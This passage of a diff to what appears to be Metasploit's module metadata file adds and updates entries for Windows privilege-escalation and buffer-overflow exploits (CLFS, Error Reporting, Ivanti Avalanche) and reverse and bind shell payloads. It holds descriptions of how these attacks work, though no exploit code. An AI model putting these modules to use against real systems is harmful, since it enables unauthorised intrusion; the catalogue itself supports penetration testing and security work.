0x90 bytes of memory). It then releases a certain number of\n            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n            This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in\n            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).",
+    "references": [
+      "CVE-2023-28252",
+      "URL-https://github.com/fortra/CVE-2023-28252"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2023-09-11 13:10:57 +0000",
+    "path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2023_28252_clfs_driver",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -162916,6 +165679,64 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_windows/local/win_error_cve_2023_36874": {
+    "name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/win_error_cve_2023_36874",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-07-11",
+    "type": "exploit",
+    "author": [
+      "Filip Dragović (Wh04m1001)",
+      "Octoberfest7",
+      "bwatters-r7"
+    ],
+    "description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n          parser.  If you open a report, Windows uses a relative path to locate the rendering program.\n          By creating a specific alternate directory structure, we can coerce Windows into opening an\n          arbitrary executable as SYSTEM.\n          If the current user is a local admin, the system will attempt impersonation and the exploit will\n          fail.",
+    "references": [
+      "CVE-2023-36874",
+      "URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
+      "URL-https://github.com/Wh04m1001/CVE-2023-36874",
+      "URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-09-27 09:43:32 +0000",
+    "path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/win_error_cve_2023_36874",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell",
+      "powershell"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
@@ -166864,6 +169685,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/ivanti_avalanche_mdm_bof": {
+    "name": "Ivanti Avalanche MDM Buffer Overflow",
+    "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-08-14",
+    "type": "exploit",
+    "author": [
+      "Ege BALCI egebalci <Ege BALCI egebalci@pm.me>",
+      "A researcher at Tenable"
+    ],
+    "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n          An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n          which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n          This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n          The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n          Upon successful exploitation the attacker gains full access to the target system.\n\n          This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.",
+    "references": [
+      "CVE-2023-32560",
+      "URL-https://www.tenable.com/security/research/tra-2023-27",
+      "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 1777,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Ivanti Avalanche <= v6.4.0.0"
+    ],
+    "mod_time": "2023-09-04 16:46:14 +0000",
+    "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/ivanti_avalanche_mdm_bof",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/landesk_aolnsrvr": {
    "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow",
    "fullname": "exploit/windows/misc/landesk_aolnsrvr",
@@ -167442,7 +170315,7 @@
      "PlugX Type I",
      "PlugX Type II"
    ],
-    "mod_time": "2021-02-13 04:10:13 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/misc/plugx.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/plugx",
@@ -169267,7 +172140,7 @@
    "targets": [
      "MySQL on Windows prior to Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_mof.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_mof",
@@ -169311,7 +172184,7 @@
    "targets": [
      "MySQL on Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-08-17 19:07:28 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_start_up",
@@ -169495,7 +172368,7 @@
    "targets": [
      "Windows Universal (x64) - v7.80.3132"
    ],
-    "mod_time": "2023-02-08 15:46:07 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -170634,7 +173507,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -170683,7 +173556,7 @@
      "Execute payload (x64)",
      "Neutralize implant"
    ],
-    "mod_time": "2020-01-29 13:16:02 +0000",
+    "mod_time": "2023-09-15 16:42:03 +0000",
    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
@@ -170702,6 +173575,9 @@
      ],
      "Reliability": [
        "repeatable-session"
+      ],
+      "SideEffects": [
+
      ]
    },
    "session_types": false,
@@ -173330,7 +176206,7 @@
      "CVE-2008-4250",
      "OSVDB-49243",
      "MSB-MS08-067",
-      "URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"
+      "URL-https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -173427,7 +176303,7 @@
      "Windows 2003 SP2 Swedish (NX)",
      "Windows 2003 SP2 Turkish (NX)"
    ],
-    "mod_time": "2021-12-02 16:33:02 +0000",
+    "mod_time": "2023-07-10 16:54:42 +0000",
    "path": "/modules/exploits/windows/smb/ms08_067_netapi.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms08_067_netapi",
@@ -173676,7 +176552,7 @@
      "Windows 10 Pro",
      "Windows 10 Enterprise Evaluation"
    ],
-    "mod_time": "2022-08-08 01:40:15 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -173939,7 +176815,7 @@
      "Execute payload (x64)",
      "Neutralize implant"
    ],
-    "mod_time": "2020-05-07 20:22:56 +0000",
+    "mod_time": "2023-09-15 16:40:22 +0000",
    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/smb_doublepulsar_rce",
@@ -173959,6 +176835,9 @@
      ],
      "Reliability": [
        "repeatable-session"
+      ],
+      "SideEffects": [
+
      ]
    },
    "session_types": false,
@@ -176896,7 +179775,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -176934,7 +179813,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -176972,7 +179851,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-06-19 12:11:18 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -177144,7 +180023,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell over IPv6",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177152,7 +180031,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_bind_ipv6_tcp",
@@ -177217,7 +180096,7 @@
    ],
    "description": "Listen for a connection and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177225,7 +180104,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_bind_tcp_small",
@@ -177253,7 +180132,7 @@
    ],
    "description": "Connect back to attacker and spawn a command shell over IPv6",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177261,7 +180140,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_reverse_ipv6_tcp",
@@ -177326,7 +180205,7 @@
    ],
    "description": "Connect back to attacker and spawn a command shell",
    "references": [
-
+      "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c"
    ],
    "platform": "BSD",
    "arch": "x64",
@@ -177334,7 +180213,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb",
    "is_install_path": true,
    "ref_name": "bsd/x64/shell_reverse_tcp_small",
@@ -178771,7 +181650,7 @@
    ],
    "description": "Fetch and execute an x64 payload from an HTTP server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -181230,7 +184109,7 @@
    ],
    "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -183689,7 +186568,7 @@
    ],
    "description": "Fetch and execute an x64 payload from a TFTP server.\n\n        Listen for a connection in a random port and spawn a command shell.\n        Use nmap to discover the open port: 'nmap -sS target -p-'.",
    "references": [
-
+      "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
    ],
    "platform": "Linux",
    "arch": "cmd",
@@ -185654,6 +188533,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_cmd/unix/bind_aws_instance_connect": {
+    "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)",
+    "fullname": "payload/cmd/unix/bind_aws_instance_connect",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Creates an SSH shell using AWS Instance Connect",
+    "references": [
+      "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel"
+    ],
+    "platform": "Unix",
+    "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-08-01 15:02:11 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/bind_aws_instance_connect",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_cmd/unix/bind_busybox_telnetd": {
    "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)",
    "fullname": "payload/cmd/unix/bind_busybox_telnetd",
@@ -187927,6 +190842,42 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_cmd/unix/reverse_socat_tcp": {
+    "name": "Unix Command Shell, Reverse TCP (via socat)",
+    "fullname": "payload/cmd/unix/reverse_socat_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "jheysel-r7"
+    ],
+    "description": "Creates an interactive shell via socat",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-09-06 15:52:56 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_socat_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_cmd/unix/reverse_socat_udp": {
    "name": "Unix Command Shell, Reverse UDP (via socat)",
    "fullname": "payload/cmd/unix/reverse_socat_udp",
@@ -188464,7 +191415,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp",
@@ -188507,7 +191458,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid",
@@ -188549,7 +191500,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe",
@@ -188591,7 +191542,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp",
@@ -188638,7 +191589,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4",
@@ -188681,7 +191632,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid",
@@ -188723,7 +191674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_http",
@@ -188767,7 +191718,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_https",
@@ -188809,7 +191760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe",
@@ -188851,7 +191802,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp",
@@ -188898,7 +191849,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4",
@@ -188941,7 +191892,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid",
@@ -188983,7 +191934,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp",
@@ -189025,7 +191976,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/custom/reverse_winhttps",
@@ -189067,7 +192018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp",
@@ -189109,7 +192060,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp",
@@ -189148,7 +192099,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/exec",
@@ -189188,7 +192139,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/loadlibrary",
@@ -189227,7 +192178,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/messagebox",
@@ -189269,7 +192220,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp",
@@ -189313,7 +192264,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -189358,7 +192309,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe",
@@ -189402,7 +192353,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp",
@@ -189450,7 +192401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4",
@@ -189494,7 +192445,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid",
@@ -189538,7 +192489,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http",
@@ -189585,7 +192536,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https",
@@ -189629,7 +192580,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe",
@@ -189673,7 +192624,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp",
@@ -189721,7 +192672,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4",
@@ -189765,7 +192716,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid",
@@ -189809,7 +192760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp",
@@ -189853,7 +192804,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps",
@@ -189897,7 +192848,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe",
@@ -189938,7 +192889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp",
@@ -189979,7 +192930,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
